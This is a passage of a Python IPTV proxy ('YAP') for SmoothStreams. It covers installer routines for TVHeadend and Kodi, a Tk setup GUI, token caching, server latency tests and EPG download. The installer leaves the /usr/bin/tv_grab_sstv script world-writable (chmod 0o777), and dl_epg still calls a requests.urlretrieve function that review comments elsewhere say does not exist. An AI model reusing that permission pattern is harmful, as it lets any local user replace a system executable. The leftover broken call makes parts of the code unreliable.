            EXTPORT = config["externalport"]
            SERVER_HOST = "http://" + LISTEN_IP + ":" + str(LISTEN_PORT)
            EXT_HOST = "http://" + EXTIP + ":" + str(EXTPORT)
            with open(os.path.join(os.path.dirname(sys.argv[0]), 'proxysettings.json'), 'w') as fp:
                dump(config, fp)
        else:
            # Tk GUI setup; GUI.gather() writes proxysettings.json and
            # sets the globals before mainloop returns.
            root = tkinter.Tk()
            root.title("YAP Setup")
            # root.geometry('750x600')
            app = GUI(root)  # calling the class to run
            root.mainloop()
        installer()
    # advanced overrides apply on every startup, config file or not
    adv_settings()
# --install on the command line forces the installer to run immediately.
if args.install:
    installer()
############################################################
# INSTALL
############################################################
def installer():
    """First-run setup: register the XMLTV grabber with TVHeadend (when
    present), drop default Kodi PVR config files (when the addon data
    directory exists), and ensure Templates/device.xml is written."""
    # TVHeadend is assumed installed if its grabber scanner binary exists.
    if os.path.isfile(os.path.join('/usr', 'bin', 'tv_find_grabbers')):
        writetvGrabFile()
        os.chmod('/usr/bin/tv_grab_sstv', 0o777)
        # re-scan so TVHeadend picks up the new grabber
        proc = subprocess.Popen("/usr/bin/tv_find_grabbers")
    # Kodi PVR Simple Client addon present -> write its settings/genre map
    if os.path.isdir(ADDONPATH):
        writesettings()
        writegenres()
    template_dir = os.path.join(os.path.dirname(sys.argv[0]), 'Templates')
    if not os.path.isdir(template_dir):
        os.mkdir(template_dir)
    writetemplate()
def writetvGrabFile():
    """Write /usr/bin/tv_grab_sstv: a minimal XMLTV grabber shell script
    for TVHeadend that fetches this proxy's epg.xml (advertises only the
    'baseline' capability)."""
    f = open(os.path.join('/usr', 'bin', 'tv_grab_sstv'), 'w')
    tvGrabFile = '''#!/bin/sh
dflag=
vflag=
cflag=
#Save this file into /usr/bin ensure HTS user has read/write and the file is executable
URL="%s/%s/epg.xml"
DESCRIPTION="SmoothStreamsTV"
VERSION="1.1"
if [ $# -lt 1 ]; then
wget -q -O - $URL
exit 0
fi
for a in "$@"; do
[ "$a" = "-d" -o "$a" = "--description" ] && dflag=1
[ "$a" = "-v" -o "$a" = "--version" ] && vflag=1
[ "$a" = "-c" -o "$a" = "--capabilities" ] && cflag=1
done
if [ -n "$dflag" ]; then
echo $DESCRIPTION
fi
if [ -n "$vflag" ]; then
echo $VERSION
fi
if [ -n "$cflag" ]; then
echo "baseline"
fi''' % (SERVER_HOST, SERVER_PATH)
    f.write(tvGrabFile)
    f.close()
# lazy install, low priority
def writesettings():
    """Write settings.xml for Kodi's PVR Simple Client addon, pointing
    its EPG and M3U URLs at this proxy (SERVER_HOST/SERVER_PATH)."""
    xmldata = """<settings>
<setting id="epgCache" value="false" />
<setting id="epgPath" value="" />
<setting id="epgPathType" value="1" />
<setting id="epgTSOverride" value="true" />
<setting id="epgTimeShift" value="0.0" />
<setting id="epgUrl" value="%s/%s/epg.xml" />
<setting id="logoBaseUrl" value="" />
<setting id="logoFromEpg" value="1" />
<setting id="logoPath" value="" />
<setting id="logoPathType" value="1" />
<setting id="m3uCache" value="true" />
<setting id="m3uPath" value="" />
<setting id="m3uPathType" value="1" />
<setting id="m3uUrl" value="%s/%s/kodi.m3u8" />
<setting id="sep1" value="" />
<setting id="sep2" value="" />
<setting id="sep3" value="" />
<setting id="startNum" value="1" />
</settings>""" % (SERVER_HOST, SERVER_PATH, SERVER_HOST, SERVER_PATH)
    with open(os.path.join(ADDONPATH, 'settings.xml'), 'w') as f:
        f.write(xmldata)
def writegenres():
    """Write a genres.xml DVB genre mapping for Kodi's PVR Simple Client
    into the addon data directory (ADDONPATH).

    NOTE(review): several sports entries reuse unrelated DVB type codes
    (e.g. Basketball as type 16, which is Movie/Drama) -- presumably to
    pick specific EPG colours in Kodi; confirm before "fixing".
    """
    f = open(os.path.join(ADDONPATH, 'genres.xml'), 'w')
    xmldata = """<genres>
<!---UNDEFINED--->
<genre type="00">Undefined</genre>
<!---MOVIE/DRAMA--->
<genre type="16">Movie/Drama</genre>
<genre type="16" subtype="01">Detective/Thriller</genre>
<genre type="16" subtype="02">Adventure/Western/War</genre>
<genre type="16" subtype="03">Science Fiction/Fantasy/Horror</genre>
<genre type="16" subtype="04">Comedy</genre>
<genre type="16" subtype="05">Soap/Melodrama/Folkloric</genre>
<genre type="16" subtype="06">Romance</genre>
<genre type="16" subtype="07">Serious/Classical/Religious/Historical Movie/Drama</genre>
<genre type="16" subtype="08">Adult Movie/Drama</genre>
<!---NEWS/CURRENT AFFAIRS--->
<genre type="32">News/Current Affairs</genre>
<genre type="32" subtype="01">News/Weather Report</genre>
<genre type="32" subtype="02">News Magazine</genre>
<genre type="32" subtype="03">Documentary</genre>
<genre type="32" subtype="04">Discussion/Interview/Debate</genre>
<!---SHOW--->
<genre type="48">Show/Game Show</genre>
<genre type="48" subtype="01">Game Show/Quiz/Contest</genre>
<genre type="48" subtype="02">Variety Show</genre>
<genre type="48" subtype="03">Talk Show</genre>
<!---SPORTS--->
<genre type="64">Sports</genre>
<genre type="64" subtype="01">Special Event</genre>
<genre type="64" subtype="02">Sport Magazine</genre>
<genre type="96" subtype="03">Football</genre>
<genre type="144">Tennis/Squash</genre>
<genre type="64" subtype="05">Team Sports</genre>
<genre type="64" subtype="06">Athletics</genre>
<genre type="160">Motor Sport</genre>
<genre type="64" subtype="08">Water Sport</genre>
<genre type="64" subtype="09">Winter Sports</genre>
<genre type="64" subtype="10">Equestrian</genre>
<genre type="176">Martial Sports</genre>
<genre type="16">Basketball</genre>
<genre type="32">Baseball</genre>
<genre type="48">Soccer</genre>
<genre type="80">Ice Hockey</genre>
<genre type="112">Golf</genre>
<genre type="128">Cricket</genre>
<!---CHILDREN/YOUTH--->
<genre type="80">Children's/Youth Programmes</genre>
<genre type="80" subtype="01">Pre-school Children's Programmes</genre>
<genre type="80" subtype="02">Entertainment Programmes for 6 to 14</genre>
<genre type="80" subtype="03">Entertainment Programmes for 16 to 16</genre>
<genre type="80" subtype="04">Informational/Educational/School Programme</genre>
<genre type="80" subtype="05">Cartoons/Puppets</genre>
<!---MUSIC/BALLET/DANCE--->
<genre type="96">Music/Ballet/Dance</genre>
<genre type="96" subtype="01">Rock/Pop</genre>
<genre type="96" subtype="02">Serious/Classical Music</genre>
<genre type="96" subtype="03">Folk/Traditional Music</genre>
<genre type="96" subtype="04">Musical/Opera</genre>
<genre type="96" subtype="05">Ballet</genre>
<!---ARTS/CULTURE--->
<genre type="112">Arts/Culture</genre>
<genre type="112" subtype="01">Performing Arts</genre>
<genre type="112" subtype="02">Fine Arts</genre>
<genre type="112" subtype="03">Religion</genre>
<genre type="112" subtype="04">Popular Culture/Traditional Arts</genre>
<genre type="112" subtype="05">Literature</genre>
<genre type="112" subtype="06">Film/Cinema</genre>
<genre type="112" subtype="07">Experimental Film/Video</genre>
<genre type="112" subtype="08">Broadcasting/Press</genre>
<genre type="112" subtype="09">New Media</genre>
<genre type="112" subtype="10">Arts/Culture Magazines</genre>
<genre type="112" subtype="11">Fashion</genre>
<!---SOCIAL/POLITICAL/ECONOMICS--->
<genre type="128">Social/Political/Economics</genre>
<genre type="128" subtype="01">Magazines/Reports/Documentary</genre>
<genre type="128" subtype="02">Economics/Social Advisory</genre>
<genre type="128" subtype="03">Remarkable People</genre>
<!---EDUCATIONAL/SCIENCE--->
<genre type="144">Education/Science/Factual</genre>
<genre type="144" subtype="01">Nature/Animals/Environment</genre>
<genre type="144" subtype="02">Technology/Natural Sciences</genre>
<genre type="144" subtype="03">Medicine/Physiology/Psychology</genre>
<genre type="144" subtype="04">Foreign Countries/Expeditions</genre>
<genre type="144" subtype="05">Social/Spiritual Sciences</genre>
<genre type="144" subtype="06">Further Education</genre>
<genre type="144" subtype="07">Languages</genre>
<!---LEISURE/HOBBIES--->
<genre type="160">Leisure/Hobbies</genre>
<genre type="160" subtype="01">Tourism/Travel</genre>
<genre type="160" subtype="02">Handicraft</genre>
<genre type="160" subtype="03">Motoring</genre>
<genre type="160" subtype="04">Fitness & Health</genre>
<genre type="160" subtype="05">Cooking</genre>
<genre type="160" subtype="06">Advertisement/Shopping</genre>
<genre type="160" subtype="07">Gardening</genre>
<!---SPECIAL--->
<genre type="176">Special Characteristics</genre>
<genre type="176" subtype="01">Original Language</genre>
<genre type="176" subtype="02">Black & White</genre>
<genre type="176" subtype="03">Unpublished</genre>
<genre type="176" subtype="04">Live Broadcast</genre>
</genres>"""
    f.write(xmldata)
    f.close()
def writetemplate():
    """Write Templates/device.xml, the UPnP device-description template
    (Jinja-style placeholders) served to HDHomeRun-style clients."""
    xmldata = """<root xmlns="urn:schemas-upnp-org:device-1-0">
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<URLBase>{{ data.BaseURL }}</URLBase>
<device>
<deviceType>urn:schemas-upnp-org:device:MediaServer:1</deviceType>
<friendlyName>{{ data.FriendlyName }}</friendlyName>
<manufacturer>{{ data.Manufacturer }}</manufacturer>
<modelName>{{ data.ModelNumber }}</modelName>
<modelNumber>{{ data.ModelNumber }}</modelNumber>
<serialNumber></serialNumber>
<UDN>uuid:{{ data.DeviceID }}</UDN>
</device>
</root>"""
    with open(os.path.join(os.path.dirname(sys.argv[0]), 'Templates', 'device.xml'), 'w') as f:
        f.write(xmldata)
############################################################
# INSTALL GUI
############################################################
if not HEADLESS:
    class ToggledFrame(tkinter.Frame):
        """A frame with a +/- checkbutton header that shows or hides its
        sub_frame body; used to collapse the Optional/Advanced sections
        of the setup GUI. Callers grid their widgets into sub_frame."""
        def __init__(self, parent, text="", *args, **options):
            tkinter.Frame.__init__(self, parent, *args, **options)
            # 0 = collapsed, 1 = expanded; bound to the checkbutton below
            self.show = tkinter.IntVar()
            self.show.set(0)
            self.title_frame = tkinter.Frame(self)
            self.title_frame.pack(fill="x", expand=1)
            tkinter.Label(self.title_frame, text=text).pack(side="left", fill="x", expand=1)
            self.toggle_button = tkinter.Checkbutton(self.title_frame, width=2, text='+', command=self.toggle,
                                                     variable=self.show)
            self.toggle_button.pack(side="left")
            self.sub_frame = tkinter.Frame(self, relief="sunken", borderwidth=1)
        def toggle(self):
            """Pack or forget sub_frame to match the checkbutton state."""
            if bool(self.show.get()):
                self.sub_frame.pack(fill="x", expand=1)
                self.toggle_button.configure(text='-')
            else:
                self.sub_frame.forget()
                self.toggle_button.configure(text='+')
    class GUI(tkinter.Frame):
        """First-run setup window. Collects credentials and proxy options;
        the nested gather() (wired to the Submit button) persists them to
        proxysettings.json, updates the module globals, then replaces the
        form with a launch screen whose button closes the window."""
        def client_exit(self, root):
            """Destroy the window so load_settings() can continue."""
            root.destroy()
        def __init__(self, master):
            """Build the form. The user* Tk variables are locals captured
            by the gather() closure, not instance attributes."""
            tkinter.Frame.__init__(self, master)
            # --- Minimum settings section ---
            self.t1 = tkinter.StringVar()
            self.t1.set("Minimum Settings")
            t1 = tkinter.Label(master, textvariable=self.t1, height=2)
            t1.grid(row=1, column=2)
            self.labelUsername = tkinter.StringVar()
            self.labelUsername.set("Username")
            labelUsername = tkinter.Label(master, textvariable=self.labelUsername, height=2)
            labelUsername.grid(row=2, column=1)
            #
            userUsername = tkinter.StringVar()
            userUsername.set("blogs@hotmail.com")
            self.username = tkinter.Entry(master, textvariable=userUsername, width=30)
            self.username.grid(row=2, column=2)
            #
            self.noteUsername = tkinter.StringVar()
            self.noteUsername.set("mystreams will not be an email address")
            noteUsername = tkinter.Label(master, textvariable=self.noteUsername, height=2)
            noteUsername.grid(row=2, column=3)
            self.labelPassword = tkinter.StringVar()
            self.labelPassword.set("Password")
            labelPassword = tkinter.Label(master, textvariable=self.labelPassword, height=2)
            labelPassword.grid(row=3, column=1)
            #
            userPassword = tkinter.StringVar()
            userPassword.set("blogs123")
            self.password = tkinter.Entry(master, textvariable=userPassword, width=30)
            self.password.grid(row=3, column=2)
            self.labelSite = tkinter.StringVar()
            self.labelSite.set("Site")
            labelSite = tkinter.Label(master, textvariable=self.labelSite, height=2)
            labelSite.grid(row=4, column=1)
            userSite = tkinter.StringVar()
            userSite.set('StreamTVnow')
            self.site = tkinter.OptionMenu(master, userSite, *[x[0] for x in providerList])
            self.site.grid(row=4, column=2)
            # --- Optional section (collapsible) ---
            t2 = ToggledFrame(master, text='Optional', relief="raised", borderwidth=1)
            t2.grid(row=5, column=1, columnspan=3)
            self.labelServer = tkinter.StringVar()
            self.labelServer.set("Server")
            labelServer = tkinter.Label(t2.sub_frame, textvariable=self.labelServer, height=2)
            labelServer.grid(row=1, column=1)
            userServer = tkinter.StringVar()
            userServer.set('Auto')
            self.server = tkinter.OptionMenu(t2.sub_frame, userServer, *['Auto'] + [x[0] for x in serverList])
            self.server.grid(row=1, column=2)
            self.labelStream = tkinter.StringVar()
            self.labelStream.set("Stream Type")
            labelStream = tkinter.Label(t2.sub_frame, textvariable=self.labelStream, height=2)
            labelStream.grid(row=2, column=1)
            userStream = tkinter.StringVar()
            userStream.set('HLS')
            self.stream = tkinter.OptionMenu(t2.sub_frame, userStream, *[x.upper() for x in streamtype])
            self.stream.grid(row=2, column=2)
            self.labelQuality = tkinter.StringVar()
            self.labelQuality.set("Quality")
            labelQuality = tkinter.Label(t2.sub_frame, textvariable=self.labelQuality, height=2)
            labelQuality.grid(row=3, column=1)
            userQuality = tkinter.StringVar()
            userQuality.set('HD')
            self.quality = tkinter.OptionMenu(t2.sub_frame, userQuality, *[x[0] for x in qualityList])
            self.quality.grid(row=3, column=2)
            self.labelIP = tkinter.StringVar()
            self.labelIP.set("Listen IP")
            labelIP = tkinter.Label(t2.sub_frame, textvariable=self.labelIP, height=2)
            labelIP.grid(row=4, column=1)
            userIP = tkinter.StringVar()
            userIP.set(LISTEN_IP)
            self.ip = tkinter.Entry(t2.sub_frame, textvariable=userIP, width=30)
            self.ip.grid(row=4, column=2)
            self.noteIP = tkinter.StringVar()
            self.noteIP.set("If using on other machines then set a static IP and use that.")
            noteIP = tkinter.Label(t2.sub_frame, textvariable=self.noteIP, height=2)
            noteIP.grid(row=4, column=3)
            self.labelPort = tkinter.StringVar()
            self.labelPort.set("Listen Port")
            labelPort = tkinter.Label(t2.sub_frame, textvariable=self.labelPort, height=2)
            labelPort.grid(row=5, column=1)
            userPort = tkinter.IntVar()
            userPort.set(LISTEN_PORT)
            self.port = tkinter.Entry(t2.sub_frame, textvariable=userPort, width=30)
            self.port.grid(row=5, column=2)
            self.notePort = tkinter.StringVar()
            self.notePort.set("If 80 doesn't work try 99")
            notePort = tkinter.Label(t2.sub_frame, textvariable=self.notePort, height=2)
            notePort.grid(row=5, column=3)
            # --- Advanced section (collapsible) ---
            t3 = ToggledFrame(master, text='Advanced', relief="raised", borderwidth=1)
            t3.grid(row=6, column=1, columnspan=3)
            self.labelKodiPort = tkinter.StringVar()
            self.labelKodiPort.set("KodiPort")
            labelKodiPort = tkinter.Label(t3.sub_frame, textvariable=self.labelKodiPort, height=2)
            labelKodiPort.grid(row=1, column=1)
            userKodiPort = tkinter.IntVar(None)
            userKodiPort.set(KODIPORT)
            self.kodiport = tkinter.Entry(t3.sub_frame, textvariable=userKodiPort, width=30)
            self.kodiport.grid(row=1, column=2)
            self.noteKodiPort = tkinter.StringVar()
            self.noteKodiPort.set("Only change if you've had to change the Kodi port")
            noteKodiPort = tkinter.Label(t3.sub_frame, textvariable=self.noteKodiPort, height=2)
            noteKodiPort.grid(row=1, column=3)
            self.labelExternalIP = tkinter.StringVar()
            self.labelExternalIP.set("External IP")
            labelExternalIP = tkinter.Label(t3.sub_frame, textvariable=self.labelExternalIP, height=2)
            labelExternalIP.grid(row=2, column=1)
            userExternalIP = tkinter.StringVar()
            userExternalIP.set(EXTIP)
            self.externalip = tkinter.Entry(t3.sub_frame, textvariable=userExternalIP, width=30)
            self.externalip.grid(row=2, column=2)
            self.noteExternalIP = tkinter.StringVar()
            self.noteExternalIP.set("Enter your public IP or Dynamic DNS,\nfor use when you wish to use this remotely.")
            noteExternalIP = tkinter.Label(t3.sub_frame, textvariable=self.noteExternalIP, height=2)
            noteExternalIP.grid(row=2, column=3)
            self.labelExternalPort = tkinter.StringVar()
            self.labelExternalPort.set("External Port")
            labelExternalPort = tkinter.Label(t3.sub_frame, textvariable=self.labelExternalPort, height=2)
            labelExternalPort.grid(row=3, column=1)
            userExternalPort = tkinter.IntVar(None)
            userExternalPort.set(EXTPORT)
            self.extport = tkinter.Entry(t3.sub_frame, textvariable=userExternalPort, width=30)
            self.extport.grid(row=3, column=2)
            def gather():
                """Submit handler: read the form (via the captured Tk
                variables), update globals, save proxysettings.json, and
                swap the form for a launch screen."""
                global playlist, kodiplaylist, QUAL, QUALLIMIT, USER, PASS, SRVR, SITE, STRM, KODIPORT, LISTEN_IP, LISTEN_PORT, EXTIP, EXT_HOST, SERVER_HOST, EXTPORT
                config = {}
                config["username"] = userUsername.get()
                config["password"] = userPassword.get()
                config["stream"] = userStream.get().lower()
                # map display names back to their internal codes
                for sub in providerList:
                    if userSite.get() in sub[0]:
                        config["service"] = sub[1]
                for sub in qualityList:
                    if userQuality.get() in sub[0]:
                        config["quality"] = sub[1]
                config["ip"] = userIP.get()
                config["port"] = userPort.get()
                config["kodiport"] = userKodiPort.get()
                config["externalip"] = userExternalIP.get()
                config["externalport"] = userExternalPort.get()
                QUAL = config["quality"]
                USER = config["username"]
                PASS = config["password"]
                SITE = config["service"]
                STRM = config["stream"]
                KODIPORT = config["kodiport"]
                LISTEN_IP = config["ip"]
                LISTEN_PORT = config["port"]
                EXTIP = config["externalip"]
                EXTPORT = config["externalport"]
                EXT_HOST = "http://" + EXTIP + ":" + str(EXTPORT)
                SERVER_HOST = "http://" + LISTEN_IP + ":" + str(LISTEN_PORT)
                if userServer.get() != 'Auto':
                    for sub in serverList:
                        if userServer.get() in sub[0]:
                            config["server"] = sub[1]
                            SRVR = config["server"]
                else:
                    # probe response times and pick primary + backup
                    testServers(update_settings=True)
                    config["server"] = SRVR
                    config["server_spare"] = SRVR_SPARE
                # clear the form before showing the launch screen
                for widget in master.winfo_children():
                    widget.destroy()
                with open(os.path.join(os.path.dirname(sys.argv[0]), 'proxysettings.json'), 'w') as fp:
                    dump(config, fp)
                self.labelSetting1 = tkinter.StringVar()
                self.labelSetting1.set("Open a web browser and go to %s for instructions and output URLs." % urljoin(SERVER_HOST, SERVER_PATH))
                labelSetting1 = tkinter.Label(master, textvariable=self.labelSetting1, height=2)
                labelSetting1.grid(row=1)
                self.labelFooter = tkinter.StringVar()
                self.labelFooter.set("URLs can also be found later on the YAP main screen after each launch")
                labelFooter = tkinter.Label(master, textvariable=self.labelFooter, height=4)
                labelFooter.grid(row=2)
                button1 = tkinter.Button(master, text="Launch YAP!!", width=20,
                                         command=lambda: self.client_exit(master))
                button1.grid(row=3)
            button1 = tkinter.Button(master, text="Submit", width=20, command=lambda: gather())
            button1.grid(row=7, column=1, columnspan=3)
############################################################
# MISC
############################################################
# Auth token cache lives next to the script in cache/token.json.
TOKEN_PATH = os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'token.json')
def load_token():
    """Populate the global token from cache/token.json; if no cache file
    exists yet, persist the current in-memory token instead."""
    global token
    if not os.path.exists(TOKEN_PATH):
        dump_token()
        return
    with open(TOKEN_PATH, 'r') as fp:
        token = load(fp)
    logger.debug("Loaded token %r, expires at %s", token['hash'], token['expires'])
def dump_token():
    """Persist the global token dict to cache/token.json."""
    global token
    with open(TOKEN_PATH, 'w') as fp:
        dump(token, fp)
    logger.debug("Dumped token.json")
def find_between(s, first, last):
    """Return the substring of ``s`` between the first occurrence of
    ``first`` and the next occurrence of ``last`` after it, or "" when
    either marker is missing."""
    try:
        lo = s.index(first) + len(first)
        hi = s.index(last, lo)
    except ValueError:
        # one of the markers was not found
        return ""
    return s[lo:hi]
def dl_icons(channum):
    """Download channel icon PNGs 1..channum into the cache directory.

    Missing icons are skipped silently (best-effort). A placeholder
    'empty.png' is fetched first -- presumably channel 150's artwork is
    the designated blank; confirm against the guide assets.
    """
    # urlretrieve lives in urllib.request; the original called
    # requests.urlretrieve, which does not exist in the requests library.
    import urllib.request
    logger.debug("Downloading icons")
    icontemplate = 'https://guide.smoothstreams.tv/assets/images/channels/{0}.png'
    cache_dir = os.path.join(os.path.dirname(sys.argv[0]), 'cache')
    # create blank icon
    urllib.request.urlretrieve(icontemplate.format(150), os.path.join(cache_dir, 'empty.png'))
    for i in range(1, channum + 1):
        name = str(i) + '.png'
        try:
            urllib.request.urlretrieve(icontemplate.format(i), os.path.join(cache_dir, name))
        except Exception:
            # best-effort: some channels have no icon
            continue
            # logger.debug("No icon for channel:%s"% i)
    logger.debug("Icon download completed.")
def thread_updater():
    """Background loop: every 6 hours, compare __version__ to latest_ver
    and download the newer release into the 'updates' subdirectory.

    NOTE(review): versions are compared as strings ('10.0' < '9.0'), so
    this assumes single-digit-compatible version numbering -- confirm.
    """
    # urlretrieve lives in urllib.request; the original called
    # requests.urlretrieve, which does not exist in the requests library.
    import urllib.request
    while True:
        time.sleep(21600)  # 6 hours between checks
        if __version__ < latest_ver:
            logger.info(
                "Your version (%s%s) is out of date, the latest is %s, which has now be downloaded for you into the 'updates' subdirectory." % (
                    type, __version__, latest_ver))
            newfilename = ntpath.basename(latestfile)
            updates_dir = os.path.join(os.path.dirname(sys.argv[0]), 'updates')
            if not os.path.isdir(updates_dir):
                os.mkdir(updates_dir)
            urllib.request.urlretrieve(latestfile, os.path.join(updates_dir, newfilename))
def find_client(useragent):
    """Classify an HTTP client from its User-Agent string.

    Returns one of 'kodi', 'vlc', 'browser', 'perfectplayer', 'plex',
    'tvh', 'atv', 'samsung', 'tv', or 'unk'. Matching is first-hit, so
    specific markers (e.g. 'tvheadend', 'apple tv') are tested before
    the generic 'tv'. Fixes the original's duplicated 'mozilla' branch
    and lowercases the string once instead of per comparison.
    """
    ua = useragent.lower()
    # (substring marker, client label) in priority order
    matchers = [
        ('kodi', 'kodi'),
        ('vlc', 'vlc'),
        ('mozilla', 'browser'),
        ('dalvik', 'perfectplayer'),
        ('lavf', 'plex'),
        ('tvheadend', 'tvh'),
        ('apple tv', 'atv'),
        ('smarthub', 'samsung'),
        ('tv', 'tv'),
    ]
    for marker, client in matchers:
        if marker in ua:
            return client
    return 'unk'
def averageList(lst):
    """Return the arithmetic mean of the float-convertible entries of lst.

    Entries that cannot be converted are skipped (and logged). Returns 0
    when nothing converts -- the original raised ZeroDivisionError on an
    empty or fully non-numeric list.
    """
    logger.debug(repr(lst))
    total = 0.0
    count = 0
    for p in lst:
        try:
            total += float(p)
            count += 1
        except (TypeError, ValueError):
            logger.debug("Couldn't convert %s to float" % repr(p))
    if count == 0:
        # guard against division by zero on empty/non-numeric input
        return 0
    return total / count
def testServers(update_settings=True):
    """Probe every (non-mix) server in serverList with an authenticated
    playlist request and rank them by response time.

    When update_settings is True, the fastest host is stored in SRVR and
    the runner-up in SRVR_SPARE. Returns the fastest server's display
    name, or None if probing raised (in which case AUTO_SERVER is
    disabled). Requires a valid auth token (check_token()).
    """
    # todo
    global SRVR, SRVR_SPARE, AUTO_SERVER
    service = SRVR
    res = None
    res_host = None
    res_spare = None
    res_spare_host = None
    # lowest response time seen so far; False doubles as "none yet"
    ping = False
    check_token()
    # with util.xbmcDialogProgress('Testing servers...') as prog:
    for name, host in serverList:
        if 'mix' in name.lower():
            continue
        logger.info('Testing servers... %s' % name)
        ping_results = False
        try:
            url = "https://" + host + ".SmoothStreams.tv:443/"+ SITE + "/ch01q1.stream/playlist.m3u8?wmsAuthSign=" + token['hash']
            logger.debug('Testing url %s' % url)
            # if platform.system() == 'Windows':
            #     p = subprocess.Popen(["ping", "-n", "4", url], stdout=subprocess.PIPE,
            #                          stderr=subprocess.PIPE, shell=True)
            # else:
            #     p = subprocess.Popen(["ping", "-c", "4", url], stdout=subprocess.PIPE,
            #                          stderr=subprocess.PIPE)
            #
            # ping_results = re.compile("time=(.*?)ms").findall(str(p.communicate()[0]))
            # wall-clock round trip of a single HTTP GET stands in for ping
            t1 = time.time()
            response = req.get(url)
            t2 = time.time()
            if response.status_code == 200:
                ping_results = t2 - t1
        except:
            logger.info("Platform doesn't support ping. Disable auto server selection")
            AUTO_SERVER = False
            return None
        if ping_results:
            # NOTE(review): "n%s" looks like a lost "\n%s" escape -- confirm
            logger.debug("Server %s - %s: n%s" % (name, host, ping_results))
            avg_ping = ping_results
            if avg_ping != 0:
                if avg_ping < ping or not ping:
                    # new fastest: demote previous best to the spare slot
                    res_spare = res
                    res_spare_host = res_host
                    res = name
                    res_host = host
                    ping = avg_ping
                    if update_settings:
                        logger.info("Updating settings")
                        SRVR = str(host)
                        SRVR_SPARE = str(res_spare_host)
        else:
            logger.info("Couldn't get ping")
    if res != None:
        logger.info('Done Server with lowest response time ({0}) set to:%s'.format(ping) % res)
        AUTO_SERVER = False
    if res_spare != None:
        logger.info('Backup Server with second lowest response time set to:%s' % res_spare)
    logger.info("Done %s: %s" % (res, ping))
    return res
def findChannelURL(input_url=None, qual='1', target_serv=None, fail=0):
    """Find the fastest responding server/quality variant of input_url.

    input_url contains the placeholders 'SRVR' and 'QUAL', which are
    substituted with each candidate server host and quality code; the
    variant with the lowest HTTP response time wins.

    qual: preferred quality code ('1' HD, '2' HQ, '3' LQ).
    target_serv: server host used to narrow candidates to the same
        region (dna* / deu* prefixes). Defaults to the CURRENT global
        SRVR -- the original bound SRVR at definition time, freezing the
        value from before settings were loaded.
    fail: escalation counter -- 0 tries the closest sub-region, 1 widens
        to the whole region, 2 falls back to every server.

    Returns the best URL found; input_url unchanged if nothing responded
    after all escalations; None if a probe raised.
    """
    # todo, rtmp
    global SRVR
    if target_serv is None:
        target_serv = SRVR  # resolve at call time, not definition time
    qlist = [qual]  # , '1', '2', '3']
    res = None
    ping = False  # lowest response time seen so far (False = none yet)
    for q in range(len(qlist)):
        # skip a duplicate of the preferred quality on retry passes
        if q != 0 and qlist[q] == qual:
            continue
        options = []
        # narrow the candidate servers to target_serv's region
        if target_serv.startswith('dna') and fail != 2:
            if 'dnaw' in target_serv and fail == 0:
                options = [(name, host) for (name, host) in serverList if host.startswith('dnaw')]
            elif 'dnae' in target_serv and fail == 0:
                options = [(name, host) for (name, host) in serverList if host.startswith('dnae')]
            else:
                options = [(name, host) for (name, host) in serverList if host.startswith('dna')]
        elif target_serv.startswith('deu') and fail != 2:
            if 'deu-nl' in target_serv and fail == 0:
                options = [(name, host) for (name, host) in serverList if host.startswith('deu-nl')]
            elif 'deu-uk' in target_serv and fail == 0:
                options = [(name, host) for (name, host) in serverList if host.startswith('deu-uk')]
            else:
                options = [(name, host) for (name, host) in serverList if host.startswith('deu')]
        else:
            # asia, or final escalation: try every server
            options = serverList
        for name, host in options:
            if 'mix' in name.lower():
                continue
            td = False
            try:
                url = input_url.replace('SRVR', host).replace('QUAL', qlist[q])
                logger.debug('Testing url %s' % url)
                # wall-clock round trip of one HTTP GET stands in for ping
                t1 = time.time()
                response = req.get(url)
                t2 = time.time()
                if response.status_code == 200:
                    td = t2 - t1
            except:
                logger.info("Platform doesn't support ping. Disable auto server selection")
                return None
            if td:
                logger.debug("Server %s - %s: %s" % (name, host, repr(td)))
                if td < ping or not ping:
                    # new fastest variant (the original assigned res twice
                    # with identical expressions; the dead store is dropped)
                    res = url
                    ping = td
            else:
                logger.info("Couldn't get ping")
    if res is not None:
        logger.info('Done Server with lowest ping ({0}) set to:%s'.format(ping) % res)
        return res
    logger.info("Failed to find that channel on a similar quality or server")
    if fail < 2:
        return findChannelURL(input_url, qual='1', fail=fail + 1)
    logger.info("Failed to find that channel on any quality or server")
    return input_url
############################################################
# EPG
############################################################
def dl_epg(source=1):
    """Download the EPG guide and post-process it into cache/epg.xml and
    cache/sports.xml.

    The source parameter is kept for interface compatibility; the effective
    source is derived from the global ``fallback`` flag (1 = fog/override
    xmltv guide, 2 = raw sstv feed).
    """
    global chan_map, fallback
    # download epg xml; fallback decides the real source
    source = 2 if fallback else 1
    # Skip the download when the cached file is newer than the most recent
    # 4-hourly UTC boundary (the guide is republished every 4 hours).
    if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'epg.xml')):
        existing = os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'epg.xml')
        cur_utc_hr = datetime.utcnow().replace(microsecond=0, second=0, minute=0).hour
        target_utc_hr = (cur_utc_hr // 4) * 4
        target_utc_datetime = datetime.utcnow().replace(microsecond=0, second=0, minute=0, hour=target_utc_hr)
        logger.debug("utc time is: %s, utc target time is: %s, file time is: %s" % (
            datetime.utcnow(), target_utc_datetime, datetime.utcfromtimestamp(os.stat(existing).st_mtime)))
        if os.path.isfile(existing) and os.stat(existing).st_mtime > target_utc_datetime.timestamp():
            logger.debug("Skipping download of epg")
            return
    # each entry: [input path, output filename, source type ('fog'/'ovr'/'sstv')]
    to_process = []
    if source == 1:
        # override the xml with one of your own
        if OVRXML != '':
            if OVRXML.startswith('http://') or OVRXML.startswith('https://'):
                if OVRXML.endswith('.gz') or OVRXML.endswith('.gz?raw=1'):
                    requests.urlretrieve(OVRXML, os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawovrepg.xml.gz'))
                    unzipped = os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawovrepg.xml.gz')
                else:
                    requests.urlretrieve(OVRXML, os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawovrepg.xml'))
                    unzipped = os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawovrepg.xml')
            else:
                # OVRXML is a local file path, use it directly
                unzipped = OVRXML
        else:
            logger.info("Downloading epg")
            requests.urlretrieve("https://fast-guide.smoothstreams.tv/altepg/xmltv5.xml.gz",
                                 os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'rawepg.xml.gz'))
